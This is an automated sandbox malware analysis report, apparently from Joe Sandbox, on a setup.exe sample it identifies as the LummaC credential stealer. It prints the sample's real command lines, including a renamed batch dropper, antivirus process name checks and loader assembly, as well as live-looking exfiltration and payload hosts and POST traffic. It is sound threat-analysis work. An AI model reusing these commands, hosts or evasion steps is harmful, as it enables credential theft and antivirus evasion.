Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
setup.exe

Overview

General Information

Sample name:setup.exe
Analysis ID:1663247
MD5:3b5fc901b53fe3e365071f6c8beee90b
SHA1:3ec302af41f69d8d57d35bba3a40570bd3c13110
SHA256:1717f135b5854ecc4dfc8230c30234a2ab60020954d7c5e44ea4dcf268d52b13
Tags:AutoITexeLummaStealeruser-aachum
Infos:

Detection

LummaC Stealer
Score:92
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Yara detected LummaC Stealer
Drops PE files with a suspicious file extension
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Suspicious Copy From or To System Directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • setup.exe (PID: 7764 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: 3B5FC901B53FE3E365071F6C8BEEE90B)
    • cmd.exe (PID: 7900 cmdline: "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 8084 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 8104 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7532 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7572 cmdline: findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7560 cmdline: cmd /c md 826825 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 7584 cmdline: extrac32 /Y /E Mods.vob MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 1008 cmdline: findstr /V "Previously" Mean MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5340 cmdline: cmd /c copy /b 826825\Motion.com + Elephant + Diabetes + Severe + Tears + Slovakia + Laser + Vocal + Defend + Mixing 826825\Motion.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 3484 cmdline: cmd /c copy /b ..\Fake.vob + ..\Shock.vob + ..\Examples.vob + ..\Why.vob + ..\Girl.vob + ..\Error.vob + ..\Protective.vob g MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Motion.com (PID: 5672 cmdline: Motion.com g MD5: 62D09F076E6E0240548C2F837536A46A)
        • WerFault.exe (PID: 7560 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5672 -s 1912 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • choice.exe (PID: 3000 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Sigma Signatures

    Sigma detected: Suspicious Copy From or To System Directory
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 7764, ParentProcessName: setup.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat, ProcessId: 7900, ProcessName: cmd.exe

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Sigma detected: Search for Antivirus process
    Source: Process startedAuthor: Joe Security: Data: Command: findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn" , CommandLine: findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7900, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn" , ProcessId: 7572, ProcessName: findstr.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-04-11T16:19:35.216067+020020283713Unknown Traffic192.168.2.449726172.67.133.158443TCP
    2025-04-11T16:19:37.023467+020020283713Unknown Traffic192.168.2.449727172.67.133.158443TCP
    2025-04-11T16:19:38.253175+020020283713Unknown Traffic192.168.2.449728172.67.133.158443TCP
    2025-04-11T16:19:39.329777+020020283713Unknown Traffic192.168.2.449729172.67.133.158443TCP
    2025-04-11T16:19:43.488619+020020283713Unknown Traffic192.168.2.449730172.67.133.158443TCP
    2025-04-11T16:19:44.628501+020020283713Unknown Traffic192.168.2.449731172.67.133.158443TCP
    2025-04-11T16:19:45.925693+020020283713Unknown Traffic192.168.2.449732172.67.133.158443TCP
    2025-04-11T16:19:48.136603+020020283713Unknown Traffic192.168.2.449733172.67.133.158443TCP
    2025-04-11T16:19:49.214451+020020283713Unknown Traffic192.168.2.449734104.21.62.250443TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for submitted file
    Source: setup.exeVirustotal: Detection: 36%Perma Link
    Source: setup.exeReversingLabs: Detection: 41%
    Joe Sandbox ML detected suspicious sample
    Source: Submited SampleNeural Call Log Analysis: 96.0%
    Source: setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.4:49726 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.4:49727 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.4:49728 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.4:49729 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.4:49732 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.4:49733 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.62.250:443 -> 192.168.2.4:49734 version: TLS 1.2
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comDirectory queried: number of queries: 1001
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00405B6C FindFirstFileW,FindClose,0_2_00405B6C
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0040652D DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_0040652D
    Source: global trafficHTTP traffic detected: GET /shark.bin HTTP/1.1Connection: Keep-AliveHost: h1.mockupeastcoast.shop
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49727 -> 172.67.133.158:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49726 -> 172.67.133.158:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 172.67.133.158:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.62.250:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49728 -> 172.67.133.158:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.133.158:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.133.158:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49729 -> 172.67.133.158:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.133.158:443
    Source: global trafficHTTP traffic detected: POST /oniz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 87Host: vqaliantheart.live
    Source: global trafficHTTP traffic detected: POST /oniz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=n4vdjxEAbOQtjO4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 19610Host: vqaliantheart.live
    Source: global trafficHTTP traffic detected: POST /oniz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=892U8OMjhfz9CrxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 8767Host: vqaliantheart.live
    Source: global trafficHTTP traffic detected: POST /oniz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=E10M88dfdfAIGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 20410Host: vqaliantheart.live
    Source: global trafficHTTP traffic detected: POST /oniz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=h5dz5Qp3zbSGdYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 5450Host: vqaliantheart.live
    Source: global trafficHTTP traffic detected: POST /oniz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=j3fn2vIYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 2321Host: vqaliantheart.live
    Source: global trafficHTTP traffic detected: POST /oniz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=tt6tb21Ab7tYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 579537Host: vqaliantheart.live
    Source: global trafficHTTP traffic detected: POST /oniz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 125Host: vqaliantheart.live
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /shark.bin HTTP/1.1Connection: Keep-AliveHost: h1.mockupeastcoast.shop
    Source: global trafficDNS traffic detected: DNS query: HpKmdADIFCrtC.HpKmdADIFCrtC
    Source: global trafficDNS traffic detected: DNS query: vqaliantheart.live
    Source: global trafficDNS traffic detected: DNS query: h1.mockupeastcoast.shop
    Source: unknownHTTP traffic detected: POST /oniz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 87Host: vqaliantheart.live
    Source: setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
    Source: setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
    Source: setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: setup.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
    Source: Mixing.13.dr, Motion.com.1.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
    Source: Mixing.13.dr, Motion.com.1.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
    Source: Mixing.13.dr, Motion.com.1.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
    Source: Mixing.13.dr, Motion.com.1.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
    Source: Mixing.13.dr, Motion.com.1.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
    Source: setup.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
    Source: setup.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
    Source: setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
    Source: setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
    Source: setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    Source: setup.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
    Source: setup.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
    Source: setup.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: setup.exeString found in binary or memory: http://ocsp.comodoca.com0
    Source: setup.exeString found in binary or memory: http://ocsp.digicert.com0A
    Source: setup.exeString found in binary or memory: http://ocsp.digicert.com0C
    Source: setup.exeString found in binary or memory: http://ocsp.digicert.com0X
    Source: Mixing.13.dr, Motion.com.1.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
    Source: setup.exeString found in binary or memory: http://ocsp.sectigo.com0
    Source: Mixing.13.dr, Motion.com.1.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
    Source: Mixing.13.dr, Motion.com.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
    Source: Mixing.13.dr, Motion.com.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
    Source: Mixing.13.dr, Motion.com.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
    Source: Mixing.13.dr, Motion.com.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
    Source: Amcache.hve.24.drString found in binary or memory: http://upx.sf.net
    Source: Motion.com, 00000011.00000000.1311789104.0000000000275000.00000002.00000001.01000000.00000007.sdmp, Defend.13.dr, Motion.com.1.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
    Source: setup.exeString found in binary or memory: https://sectigo.com/CPS0
    Source: Mixing.13.dr, Motion.com.1.drString found in binary or memory: https://www.autoitscript.com/autoit3/
    Source: Motion.com.1.drString found in binary or memory: https://www.globalsign.com/repository/0
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownHTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.4:49726 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.4:49727 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.4:49728 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.4:49729 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.4:49732 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.4:49733 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.62.250:443 -> 192.168.2.4:49734 version: TLS 1.2
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00404B88 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404B88
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comProcess Stats: CPU usage > 49%
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004033E9 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004033E9
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\TravelingWrappingJump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\SummariesAdaptationJump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\PotteryDetectionJump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\ShelterPrizeJump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\DropFolkJump to behavior
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004069470_2_00406947
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004044510_2_00404451
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\826825\Motion.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5672 -s 1912
    Source: setup.exeStatic PE information: invalid certificate
    Source: setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: classification engineClassification label: mal92.troj.spyw.evad.winEXE@27/27@3/2
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00403FDF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00403FDF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00402218 CoCreateInstance,0_2_00402218
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5672
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsaE03A.tmpJump to behavior
    Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat
    Source: setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: setup.exeVirustotal: Detection: 36%
    Source: setup.exeReversingLabs: Detection: 41%
    Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\user\Desktop\setup.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
    Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 826825
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Mods.vob
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Previously" Mean
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 826825\Motion.com + Elephant + Diabetes + Severe + Tears + Slovakia + Laser + Vocal + Defend + Mixing 826825\Motion.com
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Fake.vob + ..\Shock.vob + ..\Examples.vob + ..\Why.vob + ..\Girl.vob + ..\Error.vob + ..\Protective.vob g
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\826825\Motion.com Motion.com g
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5672 -s 1912
    Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.batJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 826825Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Mods.vobJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Previously" Mean Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 826825\Motion.com + Elephant + Diabetes + Severe + Tears + Slovakia + Laser + Vocal + Defend + Mixing 826825\Motion.comJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Fake.vob + ..\Shock.vob + ..\Examples.vob + ..\Why.vob + ..\Girl.vob + ..\Error.vob + ..\Protective.vob gJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\826825\Motion.com Motion.com gJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: acgenral.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: msacm32.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
